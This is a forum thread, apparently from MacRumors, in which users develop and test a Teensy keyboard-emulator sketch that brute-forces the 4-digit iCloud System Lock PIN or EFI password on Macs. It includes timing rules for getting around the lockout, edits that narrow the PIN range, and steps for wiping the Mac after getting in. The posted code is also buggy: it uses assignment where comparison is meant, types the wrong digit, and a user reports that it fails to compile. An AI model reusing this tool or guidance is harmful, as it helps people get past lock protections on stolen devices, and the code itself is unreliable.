Sidebar Sidebar
Become a MacRumors Supporter for $50/year with no ads, ability to filter front page stories, and private forums.

How to: Unlock System Lock PIN Code

Status
Not open for further replies.
@yharrison456 you are right. He wants 150$ for a one time use tool.

@orvtech I tried with teensy, but I have big problems to get the code on the teensy. Orvtech, if you read this, please explain how to get the code on the teensy. I am noob at this teensy thing. Please help. ;)
 
Last edited:
kliffte said:
@yharrison456 you are right. He wants 150$ for a one time use tool.

@orvtech I tried with teensy, but I have big problems to get the code on the teensy. Orvtech, if you read this, please explain how to get the code on the teensy. I am noob at this teensy thing. Please help. ;)
Click to expand...

Sure budy, start by reading http://www.pjrc.com/teensy/teensyduino.html then hit http://forum.pjrc.com/threads/16349-Teensy-3-0-Beta12-Software to download the needed software.

Once you have your Arduino (Teensyduino) development environment seted up, copy my code in to a new sketch, enable the USB keyboard in the top menue and flash it.

It sounds much more complicated than what it is... I will probably end up making a video of how to do this this weekend.


PD: WTF! at that guy wanting $150 for a one time use tool?!
 
orvtech said:
I need the exact wait time.
I mean how many tries before I have to wait 5 mintues?
How long to wait before each try before we reach the 5 minutes wait?

Are there any keyboard shortcuts to changing the language, if sow, which ones?
Click to expand...


Sorry sorry sorry... been MIA for quite some time. Busy learning how to bake some tarts... :eek::eek::eek:

The exact sequence and wait time for the 4 pin entry...

1. xxxx
2. xxxx
3. xxxx
4. xxxx
5. xxxx

Wait for 1 minute

1. xxxx

Wait for 5 minutes

1. xxxx

Wait for 15 minutes

** Then it cycles back to the 5 tries **

----------
jharrison456 said:
There's no keyboard shortcuts for changing the language, as it wouldn't make sense for Apple to implement a shortcut key, you'd only need to change the language once if you needed to.

It's 5 tries for the iCloud PIN before you have to change the language.

From what I understand the EFI password tries are unlimited, so that would be the best option instead of the icloud way. I haven't formatted the SSD so it's probably still a 4 digit code and not a 6 digit code.

After I change the language, there's like a lag, you have to wait several seconds to be able to type the password in again.

I remember reading somewhere that all 9999 combinations have to be like in random order or else the mac recognizes it as a bot.
Click to expand...


I kinda think that this is not true... no bot detection.
 
Tested Orvtech Sketch

orvtech said:
Sure budy, start by reading http://www.pjrc.com/teensy/teensyduino.html then hit http://forum.pjrc.com/threads/16349-Teensy-3-0-Beta12-Software to download the needed software.

Once you have your Arduino (Teensyduino) development environment seted up, copy my code in to a new sketch, enable the USB keyboard in the top menue and flash it.

It sounds much more complicated than what it is... I will probably end up making a video of how to do this this weekend.


PD: WTF! at that guy wanting $150 for a one time use tool?!
Click to expand...


Recorded a simple video with Orvtech corrected sketch...
http://www.youtube.com/watch?v=gUHX_qWRtJY&feature=youtube_gdata_player

The Teensy have to be connected to the USB port before starting up the MacBook. But as soon as the MacBook is powered on, the Teensy started to execute the commands. Thus you can see from the video, the first input is 0002.

And there is the 1 minute, 5 minutes and 15 minutes wait between tries. So I guess. These are the parts we have to edit.

Appreciate your help Orvtech
 
ungshunjin said:
Recorded a simple video with Orvtech corrected sketch...
http://www.youtube.com/watch?v=gUHX_qWRtJY&feature=youtube_gdata_player

The Teensy have to be connected to the USB port before starting up the MacBook. But as soon as the MacBook is powered on, the Teensy started to execute the commands. Thus you can see from the video, the first input is 0002.

And there is the 1 minute, 5 minutes and 15 minutes wait between tries. So I guess. These are the parts we have to edit.

Appreciate your help Orvtech
Click to expand...


The parts where it tells you to wait for X minutes, the teensy doesn't become idle, it keeps typing the codes regardless of that, meaning that it would be missing out codes.

I'm pretty sure Orvatech designed it for the EFI, not for iCloud, you will have better luck with that as there's no timeouts or anything.

Just let it do it's thing, once it's complete, delete all partitions and re-install the OS, let us know your results! :)

Also I think you plug in the Teensy once it asks you for the code, not before otherwise it will miss out codes like it did.
 
Workaround

jharrison456 said:
The parts where it tells you to wait for X minutes, the teensy doesn't become idle, it keeps typing the codes regardless of that, meaning that it would be missing out codes.

I'm pretty sure Orvatech designed it for the EFI, not for iCloud, you will have better luck with that as there's no timeouts or anything.

Just let it do it's thing, once it's complete, delete all partitions and re-install the OS, let us know your results! :)

Also I think you plug in the Teensy once it asks you for the code, not before otherwise it will miss out codes like it did.
Click to expand...


Should not be any big issue. Teensy can still be used.
Just modify the wait time counter will do. And add in the 3 different wait time, 1min ;5min ;15min.:cool:
Lastly, it's important to plug in teensy before booting. Else MacBook will not recognize the device as a keyboard.:D
 
jharrison456 said:
Just let it do it's thing, once it's complete, delete all partitions and re-install the OS, let us know your results! :)
Click to expand...

Hi guys, I am going to manually brute force my mac and once I get past the PIN what steps will I need to take to ensure I don't simply get locked out again? How would I go about deleting all partitions and re-installing the OS? I apologize if this is a noobish question, but I am a noob.
 
IIIVenDeTTaIII said:
Hi guys, I am going to manually brute force my mac and once I get past the PIN what steps will I need to take to ensure I don't simply get locked out again? How would I go about deleting all partitions and re-installing the OS? I apologize if this is a noobish question, but I am a noob.
Click to expand...

What are you bruteforcing the cloud pin or the efi password?

Once you've entered the iCloud password as far as I know it will auto remove the efi password, you basically just boot up holding the alt key and just delete the partitions, then either plug in a USB with OSX or the disc via external and just install.
 
OK lets get this hammered down tonight, English is not my first language so I might be missing something. Confirm that this is the behavior for the iCloud PIN:


First Loop: 5 attempts; then sleep 1 minute
Second Loop: 1 attempt; then sleep 5 minutes
Third Attempt: 1 Attempt: wait 15 minutes.

Then go to First Loop.

If this is the case then we have 7 attempts every 21 minutes... plus lets say 1 minute of waits.
10000 Combinations / (7 attempts /22 minutes) = 3182 minutes
So this process should take ~53 continuos hours.

Right?
 
@orvtech
Thx. Now I have the code on the Teensy. Tested on a txt document and it works. Now I put it in my Mac 27" and try it on the EFI Password. Will keep you up to date.
 
Here is the code for iCloud login

So... here is the code for the iCloud login, It might have errors since I dont have the teensy with me where I am right now and I could not test it but I think the logic is clear.
Code: 
//#include <usb_keyboard .h>
const int ledPin = 13;
int counter = 0;
//waits for iCould
int firstloop = 0;
int secondloop = 0;
int thirdloop = 0;
boolean firstcompleted = false;
boolean secondcompleted = false;
int fakecounter = counter;
char pin[]="xxxx";
void setup() {
  pinMode(ledPin, OUTPUT);
  delay(10000);
}
void loop(){
  keyboard_modifier_keys = 0;
//lets wait 1minute and 1 second
  if (firstloop >= 5){
    delay (61000);
    firstcompleted = true;
  } 
  else if ((firstloop < 5) && (firstcompleted = false)){
    ++firstloop;
  }
//lets wait 5 minutes and one second
  if ((secondloop >= 1) && (secondcompleted = false) && (firstcompleted = true)){
    delay (301000);
    secondloop = 0;
    secondcompleted = true;
  } 
  else if   ((secondloop < 1) && (secondcompleted = false) && (firstcompleted = true)){
    ++secondloop;
  }
//lets wait 15 minutes and 1 second
  if ((thirdloop >= 1) && (secondcompleted = true)){
    delay (901000);
    thirdloop = 0;
    secondcompleted = false;
    firstcompleted = false;
    firstloop = 0;
    secondloop = 0;
    thirdloop = 0;
  } 
  else ((thirdloop < 1) && (secondcompleted = true)){
    ++thirdloop;
  }
//lets get to work
  if (counter < = 9999){
    delay(8000);
    digitalWrite(ledPin, LOW);
    delay(5500);
    digitalWrite(ledPin, HIGH);
    sprintf(pin, "%04d", fakecounter);
    Keyboard.press(pin[1]);
    delay(450);
    Keyboard.release(pin[1]);
    delay(420);
    Keyboard.press(pin[1]);
    delay(398);
    Keyboard.release(pin[1]);
    delay(510);
    Keyboard.press(pin[2]);
    delay(421);
    Keyboard.release(pin[2]);
    delay(423);
    Keyboard.press(pin[3]);
    delay(430);
    Keyboard.release(pin[3]);
    delay(525);
    Keyboard.press(KEY_ENTER);
    delay(305);
    Keyboard.release(KEY_ENTER);
  }
  //reached 4 digit PIN max value
  if (counter > 9999){
    for (int blinkies = 0; blinkies < 8; blinkies++) {
      digitalWrite(ledPin, HIGH);
      delay(20);
      digitalWrite(ledPin, LOW);
      delay(200);
    }
    delay(6000);
  }
  ++counter;
  fakecounter = counter;
}

Take in to consideration that It is 3:50AM and I am bit tired, I will test this within 24 hours.

As you can see in this code I have set 3 conditions with 3 different wait times depending on some conditions which all of them are reseted at the last loop where we reach the 15 minutes wait.
If you want shave some time you could trie to fine tune the two delays that look like this:

Code: 
delay(8000);
digitalWrite(ledPin, LOW);
delay(5500);
Above values are in milli seconds
 
Update! Here is a little Video of my Imac and the Teensy working great. Sorry for the bad quality.

http://www.youtube.com/watch?v=XcYGQyuVEWk

Like I wrote above I tried to Brute-Force the EFI Password, because it has not the long waiting time like the 4 Pin Page when you boot normal. Started at 10:33 AM (Germany) and looked every hour at it until 15:33. Suddenly a friend arrived and we talked for about two hours. At about 18:35 I looked at my screen and saw that I was at the 4 Pin Page and it says I have to wait 5 Minutes. For my opinion there are only 2 possible reasons:

1. Something went wrong with Teensy or Imac (maybe reboot after 1000 tries?) and it started up normal. So I have to start again.

or

2. Teensy wrote down the right code and “Select Boot Drive” Page appeared. In fact that Teensy will press the enter key, the system was booting with harddrive, which guide us to the 4 Pin Page!

In my case the code has to be between 0900 -1900!

Will try more in the next days…
 
Last edited:
kliffte said:
Update! Here is a little Video of my Imac and the Teensy working great. Sorry for the bad quality.

http://www.youtube.com/watch?v=XcYGQyuVEWk

Like I wrote above I tried to Brute-Force the EFI Password, because it has not the long waiting time like the 4 Pin Page when you boot normal. Started at 10:33 AM (Germany) and looked every hour at it until 15:33. Suddenly a friend arrived and we talked for about two hours. At about 18:35 I looked at my screen and saw that I was at the 4 Pin Page and it says I have to wait 5 Minutes. For my opinion there are only 2 possible reasons:

1. Something went wrong with Teensy or Imac (maybe reboot after 1000 tries?) and it started up normal. So I have to start again.

or

2. Teensy wrote down the right code and “Select Boot Drive” Page appeared. In fact that Teensy will press the enter key, the system was booting with harddrive, which guide us to the 4 Pin Page!

In my case the code has to be between 0900 -1900!

Will try more in the next days…
Click to expand...


How do you know the code is between 0900-1900, does the teensy tell you it?

That's possible it booted up and went to the iCloud password.

I think if you enter the EFI password it doesn't remove it, it just lets you in, then the teensy pressed the enter key and it went to the default start up drive which showed the iCloud pin.

If the EFI bruteforce fails, the iCloud pin as far as I know only has to be entered once, when it has been entered it removes the iCloud & EFI password, I don't think it's vice versa though.
 
@jharrison456
No, the Teensy is not telling me the Code;). But when the Teensy needs about 15-17 Seconds to enter 1 Code, you can calculate it. I started at 10:33 AM.:)
 
kliffte said:
@jharrison456
No, the Teensy is not telling me the Code;). But when the Teensy needs about 15-17 Seconds to enter 1 Code, you can calculate it. I started at 10:33 AM.:)
Click to expand...

I wrote a simple script (runs on linux... it should run on mac too) that estimates what code range is being tested.

When I mean range it is because I added all milliseconds for the first value and took that same value plus 1 second for the second value... so in case that the actual process takes longer than the "waits".

Here is a photo of the script running:


I again... i do not own a mac so I cant test it but the script source code is available in my blog for free.



@kliffte: You could try modifying the Teensy sketch (program) just to run that range; here are the changes you should make from:
Code: 
int counter = 0;
int fakecounter = counter;
char pin[]="xxxx";
void setup() {
pinMode(ledPin, OUTPUT);
delay(10000);
}
void loop(){
keyboard_modifier_keys = 0;
if (counter < = 9999){
To:
Code: 
int counter = 899;
int fakecounter = counter;
char pin[]="xxxx";
void setup() {
pinMode(ledPin, OUTPUT);
delay(10000);
}
void loop(){
keyboard_modifier_keys = 0;
if (counter < = 1901){

As you can see we are starting the counter at 899 and ending the counter in 1901... TBH I would go one step further and divide that range in 3 batches, so that you can be sure in what range that PIN is, so that the first batch will look like this:
Code: 
int counter = 899;
int fakecounter = counter;
char pin[]="xxxx";
void setup() {
pinMode(ledPin, OUTPUT);
delay(10000);
}
void loop(){
keyboard_modifier_keys = 0;
if (counter < = 1233){
If you manage to find it in the first or second batch then you go a gain and divide that batch by 3 and so on until you are left with a small selection of numbers that you are able to manually enter.




* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
Here a re a couple of things that I would like to share with everyone.

Why am I doing this for free?
- Because I believe knowledge should be free as in freedom and free of any cost, it should be accessible for the rich and the poor.

What do I want in exchange?
- Nothing but it would be nice if you modify the program or find a bug that you share it with me. It will make me extremely happy that if you find a way to solve a problem (doesn't matter how complex it is) that you document it and share it with everyone.
 
@orvtech
Thx for the info. I will try it as soon as possible. What is when the first batch arrives 1233, will it start again at 0899 or will it stop?

Update1: It will stop! After first batch Teensy was blinking 6 times. I understand this as: Finished.
Update2: It is in the second batch!!! When everything wents good, tomorrow I will find out which Pin it is.
 
Last edited:
orvtech said:
So... here is the code for the iCloud login, It might have errors since I dont have the teensy with me where I am right now and I could not test it but I think the logic is clear.
Code: 
//#include <usb_keyboard .h>
const int ledPin = 13;
int counter = 0;
//waits for iCould
int firstloop = 0;
int secondloop = 0;
int thirdloop = 0;
boolean firstcompleted = false;
boolean secondcompleted = false;
int fakecounter = counter;
char pin[]="xxxx";
void setup() {
  pinMode(ledPin, OUTPUT);
  delay(10000);
}
void loop(){
  keyboard_modifier_keys = 0;
//lets wait 1minute and 1 second
  if (firstloop >= 5){
    delay (61000);
    firstcompleted = true;
  } 
  else if ((firstloop < 5) && (firstcompleted = false)){
    ++firstloop;
  }
//lets wait 5 minutes and one second
  if ((secondloop >= 1) && (secondcompleted = false) && (firstcompleted = true)){
    delay (301000);
    secondloop = 0;
    secondcompleted = true;
  } 
  else if   ((secondloop < 1) && (secondcompleted = false) && (firstcompleted = true)){
    ++secondloop;
  }
//lets wait 15 minutes and 1 second
  if ((thirdloop >= 1) && (secondcompleted = true)){
    delay (901000);
    thirdloop = 0;
    secondcompleted = false;
    firstcompleted = false;
    firstloop = 0;
    secondloop = 0;
    thirdloop = 0;
  } 
  else ((thirdloop < 1) && (secondcompleted = true)){
    ++thirdloop;
  }
//lets get to work
  if (counter < = 9999){
    delay(8000);
    digitalWrite(ledPin, LOW);
    delay(5500);
    digitalWrite(ledPin, HIGH);
    sprintf(pin, "%04d", fakecounter);
    Keyboard.press(pin[1]);
    delay(450);
    Keyboard.release(pin[1]);
    delay(420);
    Keyboard.press(pin[1]);
    delay(398);
    Keyboard.release(pin[1]);
    delay(510);
    Keyboard.press(pin[2]);
    delay(421);
    Keyboard.release(pin[2]);
    delay(423);
    Keyboard.press(pin[3]);
    delay(430);
    Keyboard.release(pin[3]);
    delay(525);
    Keyboard.press(KEY_ENTER);
    delay(305);
    Keyboard.release(KEY_ENTER);
  }
  //reached 4 digit PIN max value
  if (counter > 9999){
    for (int blinkies = 0; blinkies < 8; blinkies++) {
      digitalWrite(ledPin, HIGH);
      delay(20);
      digitalWrite(ledPin, LOW);
      delay(200);
    }
    delay(6000);
  }
  ++counter;
  fakecounter = counter;
}

Take in to consideration that It is 3:50AM and I am bit tired, I will test this within 24 hours.

As you can see in this code I have set 3 conditions with 3 different wait times depending on some conditions which all of them are reseted at the last loop where we reach the 15 minutes wait.
If you want shave some time you could trie to fine tune the two delays that look like this:

Code: 
delay(8000);
digitalWrite(ledPin, LOW);
delay(5500);
Above values are in milli seconds
Click to expand...



I got an error while compiling this sketch.
Can someone please advise?

***
sketch_mar13a.ino: In function 'void loop()':
sketch_mar13a.ino:45:53: error: expected ';' before '{' token
sketch_mar13a.ino:49:17: error: expected primary-expression before '=' token
 
Status
Not open for further replies.
Register on MacRumors! This sidebar will go away, and you'll see fewer ads.
Top Bottom
Back